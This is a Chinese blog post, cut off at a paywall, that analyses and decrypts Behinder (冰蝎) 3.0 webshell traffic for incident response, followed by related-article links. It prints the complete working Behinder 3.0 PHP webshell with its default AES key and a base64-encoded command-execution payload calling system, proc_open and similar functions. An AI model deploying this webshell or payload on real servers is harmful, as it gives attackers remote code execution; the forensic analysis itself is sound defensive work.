base64还原_冰蝎3.0流量分析与还原

最新推荐文章于 2024-06-16 17:45:00 发布
最新推荐文章于 2024-06-16 17:45:00 发布
阅读量3.9k 收藏 2
点赞数
文章标签: base64还原

希望这篇文章可以真正帮助那些被打穿的单位识别与溯源。

phpshell

与冰蝎2.0在建立连接时随机生成AES密钥同时明文交换不同是,冰蝎3.0的AES密钥为连接密码32位md5值的前16位,默认连接密码rebeyond。该方法保证了全密文传输,但是依然具有一定的特点。

特征:连接content-length =5464or 5484(占比较多)
基于AES加密和base64编码,解密时通过对shell.php内容的截获获取密钥,具体操作如下所示:

def140b17b896669cb9f7a3332dcfb3c.png

以下为冰蝎3.0webshell

<?php 
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");if(!extension_loaded('openssl'))
	{
    
		$t="base64_"."decode";
		$post=$t($post."");for($i=0;$i    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}else
	{
    
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];class C{
    public function __invoke($p) {
    eval($p."");}}
    @call_user_func(new C(),$params);?>

捕获流量如下图:

0db4a6abe71b6c27eafe160433333012.png

e92130195d9288a90489120cda36680d.png

开始还原流量:
这时候的应急时也要首先获取到webshell的文件,通过提取文件中的key 也就是该密钥为连接密码32位md5值的前16位 作为我们AES的解密密钥

46348c32e5193dd287fcacafc40f1db5.png

assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY3Rpb24gZ2V0U2FmZVN0cigkc3RyKXsNCiAgICAkczEgPSBpY29udigndXRmLTgnLCdnYmsvL0lHTk9SRScsJHN0cik7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgaWYoJHMwID09ICRzdHIpew0KICAgICAgICByZXR1cm4gJHMwOw0KICAgIH1lbHNlew0KICAgICAgICByZXR1cm4gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzdHIpOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4oJGNtZCkNCnsNCiAgICBAc2V0X3RpbWVfbGltaXQoMCk7DQogICAgQGlnbm9yZV91c2VyX2Fib3J0KDEpOw0KICAgIEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsNCiAgICAkUGFkdEpuID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7DQogICAgaWYgKCEgZW1wdHkoJFBhZHRKbikpIHsNCiAgICAgICAgJFBhZHRKbiA9IHByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBleHBsb2RlKCcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBhcnJheV9tYXAoJ3RyaW0nLCAkUGFkdEpuKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkUGFkdEpuID0gYXJyYXkoKTsNCiAgICB9DQogICAgJGMgPSAkY21kOw0KICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicpKSB7DQogICAgICAgICRjID0gJGMgLiAiIDI+JjFcbiI7DQogICAgfQ0KICAgICRKdWVRREJIID0gJ2lzX2NhbGxhYmxlJzsNCiAgICAkQnZjZSA9ICdpbl9hcnJheSc7DQogICAgaWYgKCRKdWVRREJIKCdzeXN0ZW0nKSBhbmQgISAkQnZjZSgnc3lzdGVtJywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgc3lzdGVtKCRjKTsNCiAgICAgICAgJGtXSlcgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgICAgb2JfZW5kX2NsZWFuKCk7DQogICAgfSBlbHNlIGlmICgkSnVlUURCSCgncHJvY19vcGVuJykgYW5kICEgJEJ2Y2UoJ3Byb2Nfb3BlbicsICRQYWR0Sm4pKSB7DQogICAgICAgICRoYW5kbGUgPSBwcm9jX29wZW4oJGMsIGFycmF5KA0KICAgICAgICAgICAgYXJyYXkoDQogICAgICAgICAgICAgICAgJ3BpcGUnLA0KICAgICAgICAgICAgICAgICdyJw0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgIGFycmF5KA0KICAgICAgICAgICAgICAgICdwaXBlJywNCiAgICAgICAgICAgICAgICAndycNCiAgICAgICAgICAgICksDQogICAgICAgICAgICBhcnJheSgNCiAgICAgICAgICAgICAgICAncGlwZScsDQogICAgICAgICAgICAgICAgJ3cnDQogICAgICAgICAgICApDQogICAgICAgICksICRwaXBlcyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgd2hpbGUgKCEgZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICAgICAgICAka1dKVyAuPSBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KICAgICAgICB9DQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ3Bhc3N0aHJ1JykgYW5kICEgJEJ2Y2UoJ3Bhc3N0aHJ1JywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgcGFzc3RocnUoJGMpOw0KICAgICAgICAka1dKVyA9IG9iX2dldF9jb250ZW50cygpOw0KICAgICAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdzaGVsbF9leGVjJykgYW5kICEgJEJ2Y2UoJ3NoZWxsX2V4ZWMnLCAkUGFkdEpuKSkgew0KICAgICAgICAka1dKVyA9IHNoZWxsX2V4ZWMoJGMpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ2V4ZWMnKSBhbmQgISAkQnZjZSgnZXhlYycsICRQYWR0Sm4pKSB7DQogICAgICAgICRrV0pXID0gYXJyYXkoKTsNCiAgICAgICAgZXhlYygkYywgJGtXSlcpOw0KICAgICAgICAka1dKVyA9IGpvaW4oY2hyKDEwKSwgJGtXSlcpIC4gY2hyKDEwKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdleGVjJykgYW5kICEgJEJ2Y2UoJ3BvcGVuJywgJFBhZHRKbikpIHsNCiAgICAgICAgJGZwID0gcG9wZW4oJGMsICdyJyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgaWYgKGlzX3Jlc291cmNlKCRmcCkpIHsNCiAgICAgICAgICAgIHdoaWxlICghIGZlb2YoJGZwKSkgew0KICAgICAgICAgICAgICAgICRrV0pXIC49IGZyZWFkKCRmcCwgMTAyNCk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgQHBjbG9zZSgkZnApOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRrV0pXID0gMDsNCiAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJmYWlsIik7DQogICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgibm9uZSBvZiBwcm9jX29wZW4vcGFzc3RocnUvc2hlbGxfZXhlYy9leGVjL2V4ZWMgaXMgYXZhaWxhYmxlIik7DQogICAgICAgICRrZXkgPS
最低0.47元/天 解锁文章
weixin_39567046
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记一次解密wireshark抓取的冰蝎通信流量
m0_74131821的博客
04-21 1691
由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战
蚁剑、哥斯拉、菜刀、冰蝎3.0/4.0)流量特征
qq_22792465的博客
07-25 2611
环境搭建:采用php一句话进行测试,可以用bp设置代理进行抓包查看,或使用wireshark进行过滤抓包逐步解析。
入门级webshell各类流量分析
最新发布
2401_84466359的博客
06-16 1068
如果选择了不同的传输协议,就需要用冰蝎自己的加密方式生成的马,不然没法连接。首先需要我们自己生成木马,选择【传输协议】,选择【协议名称】,点击【生成服务器】,会自动弹出资源管理木马生成以后的位置接下来添加shell,我们上一步生成的马是aes加密的,这里的传输协议也要使用aes进行加密。选择其他协议是连接不成功的当我们添加好shell,进行连接后,会发出俩个请求,如下图所示,可以看到请求包和响应包都是用aes进行加密的结果执行whoami命令后再查看新增的流量
在线Base64编码加密解密还原工具
Linux,Java,SpringBoot,Python,Lua略知一点
05-12 3249
在线Base64编码加密解密还原工具 在线Base64编码加密解密还原工具 在线对数据进行base64编码加密和对base64数据进行解密还原 Base64编码要求把3个8位字节(38=24)转化为4个6位的字节(46=24),之后在6位的前面补两个0,形成8位一个字节的形式。如果剩下的字符不足3个字节,则用0填充,输出字符使用’=‘,因此编码后输出的文本末尾可能会出现1或2个’='。为了保证所输出的编码位可读字符,Base64制定了一个编码表,以便进行统一转换。编码表的大小为2^6=64,这也是Ba
某乎base64算法还原
qq_41721353的博客
09-18 651
某乎base64算法的学习
base64还原成图片
weixin_45583648的博客
09-28 4890
图片的base64形式还原成图片 前端返回给后端的是图片的base64形式的字符串,后端需要还原成图片,并保存到服务器端。 代码如下: /** * 图片保存到服务器端,用于分享到微信 * @param jsonObject */ public void serverImg(JSONObject jsonObject){ // 员工号 String userId = jsonObject.getString("userId");
冰蝎3.0流量包简单分析
道路且长 行则将至
03-08 943
思路 工具编写思路 配合系统tshark将冰蝎的POST流量进行导出, 对shell文件进行url解码和base解码,得到aes的key密钥 再使用key对数据进行解密,值得关注的是数据转换的格式很有趣,转为utf-8则乱码 现阶段困难点 由于无法过滤出原始的数据流导致无法最终服务器回显的数据 本来是想写成自动化的,有时间的话后期应该会完善
java base64 字符串编码_java将base64编码字符串还原为字节数组
weixin_33369252的博客
02-16 350
/*** 图片上传* @param imgBase* @return*/@PostMapping("/upload")public CommonResult upload(String imgBase){byte[] b1 = null;BASE64Decoder decoder = new BASE64Decoder();try{if (imgBase.indexOf("data:image/j...
PCI_Express_Base_Specification_Revision_3.0.zip_PCI Express 3_PC
07-14
2. 位编码技术:PCIe 3.0采用了8b/10b编码,相较于PCIe 2.0的64b/66b编码,虽然降低了理论数据传输效率(从8b/10b的80%到64b/66b的97.92%),但提供了更好的信号完整性,确保了在更高速度下的稳定通信。 3. 兼容性...
PCI_E_Base_Specification__3.0.rar_PCI 3.0_PCIE3.0 SPEC_pci expre
07-14
PCIE标准spec 3.0 分层描述PCIE
pci_express_base_r3.0_10nov10.pdf
12-01
Objective of the Specification This specification describes the PCI Express® architecture, interconnect attributes, fabric management, and the programming interface required to design and build ...
PCI_Express_Base_Specification_Revision3.0.pdf
11-18
4. **错误报告与处理**:增加了内部错误报告、多播、原子操作、可调整大小的BAR(Base Address Register)能力、动态功率分配、基于ID的排序、延迟容忍度报告等错误处理和系统管理功能,提升了系统的稳定性和安全性...
base64加密_Base64加密_
10-04
Base64是一种在互联网上广泛使用的编码方式,用于将二进制数据转换为可打印的ASCII字符,以便在不支持二进制传输的系统中进行传输。它将每3个字节的数据转换为4个Base64字符,使得原始数据在编码后增加了大约33%的...
在线还原base64编码的图片
weixin_38989668的博客
10-17 4374
图像编码
记一次流量分析&代码分析-冰蝎
pingan233的博客
02-22 3625
冰蝎流程图如下:冰蝎是先请求服务端,服务端判断请求之后生成一个128位的随机数,并将这个128位的随机数写入到session里面,并将这个128位的随机数返回给客户端,但是客户端并不会使用这个key作为之后的通讯的key,而是会继续重复上面过程,不断获取key,直到满足特定条件之后,才会确定是最终的key。客户端会保存这个key和响应报文里面的set-cookie的值。这个key就是之后客户端和服务端进行通讯的密匙。检测请求方式:Request.method= GET。
Shell管理工具流量分析-下(冰蝎 3.0、哥斯拉 4.0 流量分析
热门推荐
Love&Share
12-23 1万+
Shell管理工具流量分析-下(冰蝎 3.0、哥斯拉 4.0 流量分析
菜刀 蚁剑 冰蝎 哥斯拉流量特征
weixin_42750884的博客
10-13 249
冰蝎2.0相比,冰蝎3.0取消了动态密钥获取的请求,AES的密钥直接固定为连接密码32位md5的前16位,默认连接密码是"rebeyond"(即密钥是md5(‘rebeyond’)[0:16]=e45e329feb5d925b)。两次请求中,第一次请求用于判断是否可以建立连接。与冰蝎2.0相似,进行请求时内置了十几个User-Agent头,每次请求时会随机选择其中的一个。连接jsp的webshell的请求数据包中的content-type字段常见为application/octet-stream。
分析冰蝎流量特征以及请求包
weixin_46299490的博客
09-17 1696
冰蝎流量特征
冰蝎、蚁剑、哥斯拉的流量特征
qq_53218512的博客
06-11 4193
webshell管理工具,蚁剑、冰蝎哥斯拉的流量特征
冰蝎3.0和4.0流量特征
07-25
首先,在加密方式方面,冰蝎4.0引入了更多的加密方式,包括xor、xor_base64、aes、json和image等五种加密方式,并且每种加密方式都支持自定义加解密代码。而冰蝎3.0则没有这么多加密方式的选择。\[1\] 其次,在传输...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值